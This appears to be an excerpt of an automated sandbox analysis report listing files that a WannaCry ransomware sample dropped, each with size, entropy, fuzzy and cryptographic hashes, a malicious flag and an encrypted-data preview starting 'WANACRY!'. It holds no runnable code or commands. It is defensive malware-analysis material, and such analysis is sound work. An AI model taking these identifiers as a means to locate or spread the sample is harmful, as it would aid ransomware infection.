                                                                                      Entropy (8bit):7.202469499731942
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkESC+4J9kfgVqMG9Jq2gzqgthvsvufL3iKpcRpRRmIVIn:bkESDS5GahzbsWfzinR/R/VIn
                                                                                      MD5:DB3E26F736832069FDEBEE6C83922D54
                                                                                      SHA1:13DD5C24CDB7A5CB32520FE1EC149B73C4522346
                                                                                      SHA-256:041F426C2C761C89C2CB6D5FC64AEBA6126420C8D1A994A17EF077779165379C
                                                                                      SHA-512:082194B81EC01A8E749357F921F054B663A0B146E46037060CBF7A9118A6E40CFE08181A34CE5F6F61A40D92136B06961696CA00E9CEC91CF2911A7ED1EE7DEE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......|.....U..?.....E.......}...v..... &.b#..l..As.nr.yp..)...m._...{..4.....X.@I.M........e..G.ge.../....ok.[].6......9..z.:O.c.$...n>...TC...?.....H.0.....p.Z..X.%as.;A.;.x.c. y&.../...w......._..4.uM.v..g..m`.......+..YN".b..|...j.....?f.............,...K..I.f.XE.8.=-.;.m.s.AIZQm
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.202469499731942
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkESC+4J9kfgVqMG9Jq2gzqgthvsvufL3iKpcRpRRmIVIn:bkESDS5GahzbsWfzinR/R/VIn
                                                                                      MD5:DB3E26F736832069FDEBEE6C83922D54
                                                                                      SHA1:13DD5C24CDB7A5CB32520FE1EC149B73C4522346
                                                                                      SHA-256:041F426C2C761C89C2CB6D5FC64AEBA6126420C8D1A994A17EF077779165379C
                                                                                      SHA-512:082194B81EC01A8E749357F921F054B663A0B146E46037060CBF7A9118A6E40CFE08181A34CE5F6F61A40D92136B06961696CA00E9CEC91CF2911A7ED1EE7DEE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......|.....U..?.....E.......}...v..... &.b#..l..As.nr.yp..)...m._...{..4.....X.@I.M........e..G.ge.../....ok.[].6......9..z.:O.c.$...n>...TC...?.....H.0.....p.Z..X.%as.;A.;.x.c. y&.../...w......._..4.uM.v..g..m`.......+..YN".b..|...j.....?f.............,...K..I.f.XE.8.=-.;.m.s.AIZQm
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):58600
                                                                                      Entropy (8bit):7.996341129347477
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:/FwoiUtCouFGh8Bv33x/32rvudJRh6yfy0:/FFu2+Beidp6Yy0
                                                                                      MD5:A431850DFA45CAEED71693AB50E7B7F9
                                                                                      SHA1:572A36B83C9EF3B7EA99E3EA0D5950DB9E909B36
                                                                                      SHA-256:C9F63D7ADBABD7C4217F866FD348B29E24D6A2A8DF708BA85C02A5AA4BB22922
                                                                                      SHA-512:1D504FFDCF1D223E5542E8AB53A7C8CD631598B2AA49FE04CE16AB0CDB23169753355ADFF41EA9B5E7B077AE5EA95ACF1A1A659F581BB0C45208D16C1E784E73
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....y..l..n.N>......yI.{.sO..@......PW.U>...zm...>..K...[.....z.. a.Z+vJ...|..S)...u+.2=!.R...g..'.-...2.......U1.f.+#..H..'.lj....]n0.a?.!^p.eJ.~..45..>X...Rw^.~..o*...E.{.x.`..n../*..~.......}.x..;*k.=.9...H...D.../..WD....#..9..|.Z}G.O./..I............}..O..=..;r.6.......C...Fm].&..0V....2".!d,. .0...Sl.'D.h.Y..`..F.0%....q.k..{...9..8.......l.Qt........*......4...z.F......"u]..#....bC.A...H.'=.c37K....7[L.*..e......C....k...K..^T......H...S.R.1.....'..Lg..O~.m...r .....b...mE.Y......S03...F .b...f8.n8oH..@M#B...TT.....X..~>.e...u/.0.?.Z...6...c~0y,...$..d....w..F.. ..n!?3U.....\G|.x.......qx.....4..pi......=1....K;.u.a...'..K.......uL...3(..,.l....q.l{..v..xx.:m.!J.0.Ef..E....E.>.:...1.:.~.L...!..'=..../...N.P.g...g..Y..x..6H.....i.......$R4...]...J.....>3hQ....%.".36LEp..v.f....N.. ....^Hi83R...|!.....5...nm....{...N]...+O>.H.o..60D.0. .......[g.(..(....xy......Z...D.2.T......m.2u....Z(woQxO@.!....Of..(.PZ..mp.+V
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):58600
                                                                                      Entropy (8bit):7.996341129347477
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:/FwoiUtCouFGh8Bv33x/32rvudJRh6yfy0:/FFu2+Beidp6Yy0
                                                                                      MD5:A431850DFA45CAEED71693AB50E7B7F9
                                                                                      SHA1:572A36B83C9EF3B7EA99E3EA0D5950DB9E909B36
                                                                                      SHA-256:C9F63D7ADBABD7C4217F866FD348B29E24D6A2A8DF708BA85C02A5AA4BB22922
                                                                                      SHA-512:1D504FFDCF1D223E5542E8AB53A7C8CD631598B2AA49FE04CE16AB0CDB23169753355ADFF41EA9B5E7B077AE5EA95ACF1A1A659F581BB0C45208D16C1E784E73
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....y..l..n.N>......yI.{.sO..@......PW.U>...zm...>..K...[.....z.. a.Z+vJ...|..S)...u+.2=!.R...g..'.-...2.......U1.f.+#..H..'.lj....]n0.a?.!^p.eJ.~..45..>X...Rw^.~..o*...E.{.x.`..n../*..~.......}.x..;*k.=.9...H...D.../..WD....#..9..|.Z}G.O./..I............}..O..=..;r.6.......C...Fm].&..0V....2".!d,. .0...Sl.'D.h.Y..`..F.0%....q.k..{...9..8.......l.Qt........*......4...z.F......"u]..#....bC.A...H.'=.c37K....7[L.*..e......C....k...K..^T......H...S.R.1.....'..Lg..O~.m...r .....b...mE.Y......S03...F .b...f8.n8oH..@M#B...TT.....X..~>.e...u/.0.?.Z...6...c~0y,...$..d....w..F.. ..n!?3U.....\G|.x.......qx.....4..pi......=1....K;.u.a...'..K.......uL...3(..,.l....q.l{..v..xx.:m.!J.0.Ef..E....E.>.:...1.:.~.L...!..'=..../...N.P.g...g..Y..x..6H.....i.......$R4...]...J.....>3hQ....%.".36LEp..v.f....N.. ....^Hi83R...|!.....5...nm....{...N]...+O>.H.o..60D.0. .......[g.(..(....xy......Z...D.2.T......m.2u....Z(woQxO@.!....Of..(.PZ..mp.+V
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.179591841318135
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE+Nn+aLeer93YvA45quVWpo/bnJOWZFDBb0A2LSxJ6BLF5B2xiamuO:bkEyn+6Cv+uVJxFDBYvLSviF5BumuO
                                                                                      MD5:D09CDC06CD4B898701434B468FE3CAA3
                                                                                      SHA1:797206C797534FE32A8D18E010EEA7A08E014DA2
                                                                                      SHA-256:76C69F1F3EA4C48B115B52D8008703D7C7CB71E1334DC3023D01959B2A579EF3
                                                                                      SHA-512:08622290505CF801FA7FCE0C4602B300505372DE2005EE9966D4803D0D93974E4E5AD298C57FC6CB2F3736C84B8679816800776F3503655EE6F20C799BAEC2B0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......!(.{......H.i;...2.4.G~.&{c.._.f.d...........M0H.p..n-j.h..w..YN'.6.k.m.T..<[m...o........Abj.8r.>fT.D..>?D...Y..J.[.>..u.0.. p`v;..y.<+X..4..{_z..R.E.q4/.63......~.uY....Jc!..n'u..w]........D.....{.G;......\.n...8^......^.:..k.>...z...I.OC.`4............A..DK..a.....x..l..!P..j...KJs
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.179591841318135
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE+Nn+aLeer93YvA45quVWpo/bnJOWZFDBb0A2LSxJ6BLF5B2xiamuO:bkEyn+6Cv+uVJxFDBYvLSviF5BumuO
                                                                                      MD5:D09CDC06CD4B898701434B468FE3CAA3
                                                                                      SHA1:797206C797534FE32A8D18E010EEA7A08E014DA2
                                                                                      SHA-256:76C69F1F3EA4C48B115B52D8008703D7C7CB71E1334DC3023D01959B2A579EF3
                                                                                      SHA-512:08622290505CF801FA7FCE0C4602B300505372DE2005EE9966D4803D0D93974E4E5AD298C57FC6CB2F3736C84B8679816800776F3503655EE6F20C799BAEC2B0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......!(.{......H.i;...2.4.G~.&{c.._.f.d...........M0H.p..n-j.h..w..YN'.6.k.m.T..<[m...o........Abj.8r.>fT.D..>?D...Y..J.[.>..u.0.. p`v;..y.<+X..4..{_z..R.E.q4/.63......~.uY....Jc!..n'u..w]........D.....{.G;......\.n...8^......^.:..k.>...z...I.OC.`4............A..DK..a.....x..l..!P..j...KJs
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.24722755874557
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEkdIOW/9G9KedhmNONsPWks3G9KOSya30nkinm/IgpIb:bkEkdIOW/sIgmwNsPjgxPyyijgpS
                                                                                      MD5:CCB94FB358E1718884675EF92BE79429
                                                                                      SHA1:9FF85183080E52A03EAF2E5E34F114B97FC61580
                                                                                      SHA-256:85FB86E1D991C9D67AAEC6EB9BB59C35FF91B40E2BCBB7DDEBC5B3C27A58F6DA
                                                                                      SHA-512:39D5FDAD7D1CA8FBBF4B1A1787DE78FD0AF81BCCA56F3ED31091817A13FB995BE317B9DF6A9598A16E298104C056BBD41AE5DDB7E547C7A369839901259035AD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....0..xz.'N.m.......CY} .....m......4..*P..~.:...~`.~.....9....z....H.E.3..=.....`.{.i.[.<K...D}|F...tD.d.{....~........7....5NE.D.....v.I.8.p.2$:...Zy..}.....Q..._.X..VN.5n.8...........BLh.jq......O.V.'Q......II.^x....)........e..|.I.a.X......................r*...q'.+.$..........o/.s&...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.24722755874557
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEkdIOW/9G9KedhmNONsPWks3G9KOSya30nkinm/IgpIb:bkEkdIOW/sIgmwNsPjgxPyyijgpS
                                                                                      MD5:CCB94FB358E1718884675EF92BE79429
                                                                                      SHA1:9FF85183080E52A03EAF2E5E34F114B97FC61580
                                                                                      SHA-256:85FB86E1D991C9D67AAEC6EB9BB59C35FF91B40E2BCBB7DDEBC5B3C27A58F6DA
                                                                                      SHA-512:39D5FDAD7D1CA8FBBF4B1A1787DE78FD0AF81BCCA56F3ED31091817A13FB995BE317B9DF6A9598A16E298104C056BBD41AE5DDB7E547C7A369839901259035AD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....0..xz.'N.m.......CY} .....m......4..*P..~.:...~`.~.....9....z....H.E.3..=.....`.{.i.[.<K...D}|F...tD.d.{....~........7....5NE.D.....v.I.8.p.2$:...Zy..}.....Q..._.X..VN.5n.8...........BLh.jq......O.V.'Q......II.^x....)........e..|.I.a.X......................r*...q'.+.$..........o/.s&...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.284117863246617
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE26zVwjmouJqx1QxJuFTnZgw6/E2sWYWE4gM8BrU5Wgk/cowGhUqf7R:bkE2mVQb1QfKTywd2s4vjpDgUkF
                                                                                      MD5:9B34612D7EADAF948C99DDBA6EE220B1
                                                                                      SHA1:541E271D6E6ACCFB9F6950C127F890B97EF9A0C7
                                                                                      SHA-256:5EA04F9B1863F93A180760E6B3E065EE2282AE2B4B6AB02CE8330B2B52692012
                                                                                      SHA-512:8ECF794D76DE3C8CFCA7F871A45D4CA3CCD8D775645D174B5A47EAFC61D198294E021D830FE3E7E21CDE44A59C9F429CFB92DA80050E913F4B9E1219FD08A510
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d..="!.EZ.e.y.c.@.m......)..?......'..1^..`.:.T...L.C@l.HGoe.>..E..{...'....L..fw..yU..^...S.B....:...+.k..Jx..J..U...B..N...OYCi..4...f..ZaM.v..zPGQ.|=.l...............W.v....L...*.f.g.d.Sy....s.Vv..:* .0..K...... ...e.."...vV....n.._>...................<>..w...Q...;.....8&...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.284117863246617
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkE26zVwjmouJqx1QxJuFTnZgw6/E2sWYWE4gM8BrU5Wgk/cowGhUqf7R:bkE2mVQb1QfKTywd2s4vjpDgUkF
                                                                                      MD5:9B34612D7EADAF948C99DDBA6EE220B1
                                                                                      SHA1:541E271D6E6ACCFB9F6950C127F890B97EF9A0C7
                                                                                      SHA-256:5EA04F9B1863F93A180760E6B3E065EE2282AE2B4B6AB02CE8330B2B52692012
                                                                                      SHA-512:8ECF794D76DE3C8CFCA7F871A45D4CA3CCD8D775645D174B5A47EAFC61D198294E021D830FE3E7E21CDE44A59C9F429CFB92DA80050E913F4B9E1219FD08A510
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d..="!.EZ.e.y.c.@.m......)..?......'..1^..`.:.T...L.C@l.HGoe.>..E..{...'....L..fw..yU..^...S.B....:...+.k..Jx..J..U...B..N...OYCi..4...f..ZaM.v..zPGQ.|=.l...............W.v....L...*.f.g.d.Sy....s.Vv..:* .0..K...... ...e.."...vV....n.._>...................<>..w...Q...;.....8&...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.218581575409103
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEfWmxGbxXpr9rutfgKdPkgY1FZkllx7jQV4Vrz/KaRKwru50n:bkEu0GdXS9RdPu10OaVrcw
                                                                                      MD5:8EA640A0DB81A7560E453A8E74A07C8F
                                                                                      SHA1:5893186CD29BB23493A2098C59CB1949F99B1B28
                                                                                      SHA-256:612E1088F8CAFCD0EA08513AD7D3E1B614D8A21178AB2F95B056D4106FB61FBE
                                                                                      SHA-512:64397909A9EE94A5D9C6D082545631EE278729D04C53977B37407ACA48A92A254FE24794227A34CF1019401728BE5BDB5AEA7B0E2590EA4B112455EDEB292F60
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......~.^.9[?Q..NF>..7..}.......0.......~..]r."u.~......z.`....R.\..1.y.~.S.....?s.h..._.(.#.f>.......Q...e.J......&..Hw.=..."#.:8IJ...............n..By{.-...B>K(@n"3..._.'..bx'.J*G.0.#.O.)86.._6..G;4z.U..e.....:..g..:]T..iN....(.#.#.G^J...$H....6b:V.N....................t../........6.$r.l..S.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.218581575409103
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEfWmxGbxXpr9rutfgKdPkgY1FZkllx7jQV4Vrz/KaRKwru50n:bkEu0GdXS9RdPu10OaVrcw
                                                                                      MD5:8EA640A0DB81A7560E453A8E74A07C8F
                                                                                      SHA1:5893186CD29BB23493A2098C59CB1949F99B1B28
                                                                                      SHA-256:612E1088F8CAFCD0EA08513AD7D3E1B614D8A21178AB2F95B056D4106FB61FBE
                                                                                      SHA-512:64397909A9EE94A5D9C6D082545631EE278729D04C53977B37407ACA48A92A254FE24794227A34CF1019401728BE5BDB5AEA7B0E2590EA4B112455EDEB292F60
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......~.^.9[?Q..NF>..7..}.......0.......~..]r."u.~......z.`....R.\..1.y.~.S.....?s.h..._.(.#.f>.......Q...e.J......&..Hw.=..."#.:8IJ...............n..By{.-...B>K(@n"3..._.'..bx'.J*G.0.#.O.)86.._6..G;4z.U..e.....:..g..:]T..iN....(.#.#.G^J...$H....6b:V.N....................t../........6.$r.l..S.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.9998399697319025
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:+ZUWY6xdkcEwUwO/q3iuGTW4B1SX5nQWG3gKQol:mwcOlvTW4MnQWUp7
                                                                                      MD5:85481112A952298239AC72427E496C29
                                                                                      SHA1:45CC06ABC22A2211BF6DE4E5943CCA30E6BE3C68
                                                                                      SHA-256:D74405318D45E9B04736517680087A3AEBE51DA256A51E0D0B0A035027BB26E1
                                                                                      SHA-512:AF4A6FA824F33EAD3A69EE78698AA231244FD188BE265369AE02D05A295EE9DDED11AE89C3EFF74C42E8CFAB61663360EB7FA6E77B0A8E78F5115A0F63A43FBD
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....wU..jL.....0.....~n..E8.&.E..C..$..<j....L.q.|}.#&.S>.t...q...<g...^.=oy.....w.l.#D8.Q-#....=H@.%wP.zj.;?.b.JD=....!M_..E...v.@se.&Y....-."...hF.yR..q.E........9e.4..x....o..m..G..w.5Y....a....@....q...$..M'.I......#9.i|...x..<....R^C..9.x.f.^qul............D.TQxa.r.m..$.{....o[...:l..{..y.P..~.....).].....w..DbU.;.#...S8.w..[.Lw..W..P.;.......l.h.....}..#p5......#...ai.w.x.[.8..*.'...k..0|n..3p..g(..k.O....8...-1=.X.&r.]......D.Zh.6...L..>..QaS..6_.......^.?..B...... .....Z.?.c...s(... .......[}.B..W.&..'..3.V1..$..4U!.1...... 8}o.zY.h..s8aoiT...5...C5s..J...i..n..I...B..ZshTW[v...#..y..-.'...%..._vGb......._...#..<.G.k....o..".~..j...._...A...8.....d..`....@=.$J~{a.C.s.@.g..Y..E1.&^,e2...^1R....]..P,WY..JeU...p.\`...?..%?..Tl..6..n.J:.O....^..QcV~....:[.p.A....5......{..bNV..-.P0.i.....hz..A..1.. *.\...9._..=p.Ws.=0...<N..?.....c.O&..3'~m.>.iB.]...MJw.a.c..se>o......W4..T}O&.&..-.znN..2....._.........b...L*t......*#j
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.9998399697319025
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:+ZUWY6xdkcEwUwO/q3iuGTW4B1SX5nQWG3gKQol:mwcOlvTW4MnQWUp7
                                                                                      MD5:85481112A952298239AC72427E496C29
                                                                                      SHA1:45CC06ABC22A2211BF6DE4E5943CCA30E6BE3C68
                                                                                      SHA-256:D74405318D45E9B04736517680087A3AEBE51DA256A51E0D0B0A035027BB26E1
                                                                                      SHA-512:AF4A6FA824F33EAD3A69EE78698AA231244FD188BE265369AE02D05A295EE9DDED11AE89C3EFF74C42E8CFAB61663360EB7FA6E77B0A8E78F5115A0F63A43FBD
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....wU..jL.....0.....~n..E8.&.E..C..$..<j....L.q.|}.#&.S>.t...q...<g...^.=oy.....w.l.#D8.Q-#....=H@.%wP.zj.;?.b.JD=....!M_..E...v.@se.&Y....-."...hF.yR..q.E........9e.4..x....o..m..G..w.5Y....a....@....q...$..M'.I......#9.i|...x..<....R^C..9.x.f.^qul............D.TQxa.r.m..$.{....o[...:l..{..y.P..~.....).].....w..DbU.;.#...S8.w..[.Lw..W..P.;.......l.h.....}..#p5......#...ai.w.x.[.8..*.'...k..0|n..3p..g(..k.O....8...-1=.X.&r.]......D.Zh.6...L..>..QaS..6_.......^.?..B...... .....Z.?.c...s(... .......[}.B..W.&..'..3.V1..$..4U!.1...... 8}o.zY.h..s8aoiT...5...C5s..J...i..n..I...B..ZshTW[v...#..y..-.'...%..._vGb......._...#..<.G.k....o..".~..j...._...A...8.....d..`....@=.$J~{a.C.s.@.g..Y..E1.&^,e2...^1R....]..P,WY..JeU...p.\`...?..%?..Tl..6..n.J:.O....^..QcV~....:[.p.A....5......{..bNV..-.P0.i.....hz..A..1.. *.\...9._..=p.Ws.=0...<N..?.....c.O&..3'~m.>.iB.]...MJw.a.c..se>o......W4..T}O&.&..-.znN..2....._.........b...L*t......*#j
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.109613145381627
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkExvBtXuCf2ac88y16bLS0y7y8IkmyhWsd0Q+KlKlamwqlPzV0B/o6PNK:bkEJeCO9jycLpy7y8QY2KMwqlP6jk
                                                                                      MD5:162BC9EAD1F5C85C7C14AB2105BB42A3
                                                                                      SHA1:A144A9BA0C228F9385635193225AD261038E601C
                                                                                      SHA-256:CAD822ACC4B9B2F7373B92B5F83D18DC92546918C5A139AA00033343375E28DD
                                                                                      SHA-512:8DB39780EB81C1EF89A812990176E3BDB3F89EA518583703016F2AB485A34193A59085F282D7B7289F3538CA8CA236FC92BBA91EEBEA298C3394592ED390D573
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....r...s.w.omTb.c.H...J|r..).ZJ.F..D.5.H..t.m.c9..-..[...~&A....{x.)....GlE.%...G..E..I...6.H.>.f..f"k W.[...\N..].K..f.J...A.D|. ...mA&j["Z,..J.c.Me....hm....kU.Za....L...H.......E.KG..A.G..l...+W.-2.:..\..!.P.A.q\Q9...3U. ~x ....,.8.4OL......lF..............P.. ..:...^... cs...|..j...a.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.109613145381627
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkExvBtXuCf2ac88y16bLS0y7y8IkmyhWsd0Q+KlKlamwqlPzV0B/o6PNK:bkEJeCO9jycLpy7y8QY2KMwqlP6jk
                                                                                      MD5:162BC9EAD1F5C85C7C14AB2105BB42A3
                                                                                      SHA1:A144A9BA0C228F9385635193225AD261038E601C
                                                                                      SHA-256:CAD822ACC4B9B2F7373B92B5F83D18DC92546918C5A139AA00033343375E28DD
                                                                                      SHA-512:8DB39780EB81C1EF89A812990176E3BDB3F89EA518583703016F2AB485A34193A59085F282D7B7289F3538CA8CA236FC92BBA91EEBEA298C3394592ED390D573
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....r...s.w.omTb.c.H...J|r..).ZJ.F..D.5.H..t.m.c9..-..[...~&A....{x.)....GlE.%...G..E..I...6.H.>.f..f"k W.[...\N..].K..f.J...A.D|. ...mA&j["Z,..J.c.Me....hm....kU.Za....L...H.......E.KG..A.G..l...+W.-2.:..\..!.P.A.q\Q9...3U. ~x ....,.8.4OL......lF..............P.. ..:...^... cs...|..j...a.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999823989378165
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:PmewbmLUJEvI53HDRtFJm9xFQFwpMhBq06:Pmew2a1Z9ty9GZhoN
                                                                                      MD5:1FE079BFA07BF0E2D98BCF810E3664CD
                                                                                      SHA1:ABB2830B7DC5FE5BC8F4A337189F14122107EBD4
                                                                                      SHA-256:474524425B8026406B1C54CDD7CEA3B5C9DB11F4201FB8C0D0F3DD74275E23C8
                                                                                      SHA-512:D4A6597A647B307567C7612AF0A71CFD3806CC067866FA87EB12660EB6E138B2F8375EDD1AE8A5316D571B9854E43ECA2266858898C9FA13356CD2D7FD18015C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........R.n.1...M...l...Wi.....q..x...&.(B.$ .....`D.{N.B...u[...`.I.+........!Y....O.r....i.sU."91.*$...OZ9.]I.....B.w.".+...;.8.DN..W_T...e.....p6.E;"$...a.@./...[A.(F...Y8~M'.(.7..I.W~.....<.$.V...jq.......5....[$N...;...4..)..?....F.o..............f..X.$.Fz|?..=.{N.XL..)Z.2C...*,v..}L..5._.|...N.p.....L.hBG?l.....O.-.~W7...E.]...po}.D...B....`..iU.......0......[G...j.b@.2-.).H....kH..Z.....x..h.P..|>.Ag3?...'i..O....Q.q.....@.x.!.!..5...k..:].... 2.-RnH...8~V;.1.....C...l#......._.ERv..UTz..!.......k"3n.'...a..U2.h...S......F...4.{<Dea....#I....!.s.....2@*......2....V1].E....!...........8z.#..v..k....y..|d$S......ze.N.W.....5...y...sA.*G...0.1....T.-..6.%.....:v+j...YM.....!.a..x...1....H..x..R..&.......j...,.4.e..TV.r=.bD.`....n.<.9.. !.B.I...-{.*....L6A..<.t.wzyYwmN(X..A:W.k.Dj{H...~tsa...C...~..I..{..._..Aa./..S...W.g....m...t.....c8...a0C....Pb..P...pYb.p.......;..;.<25rD>i...R..@S.p..t.ZI@.f...Q..v.u.].....(.N_A.n..{
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999823989378165
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:PmewbmLUJEvI53HDRtFJm9xFQFwpMhBq06:Pmew2a1Z9ty9GZhoN
                                                                                      MD5:1FE079BFA07BF0E2D98BCF810E3664CD
                                                                                      SHA1:ABB2830B7DC5FE5BC8F4A337189F14122107EBD4
                                                                                      SHA-256:474524425B8026406B1C54CDD7CEA3B5C9DB11F4201FB8C0D0F3DD74275E23C8
                                                                                      SHA-512:D4A6597A647B307567C7612AF0A71CFD3806CC067866FA87EB12660EB6E138B2F8375EDD1AE8A5316D571B9854E43ECA2266858898C9FA13356CD2D7FD18015C
                                                                                      Malicious:true
                                                                                      Reputation:low
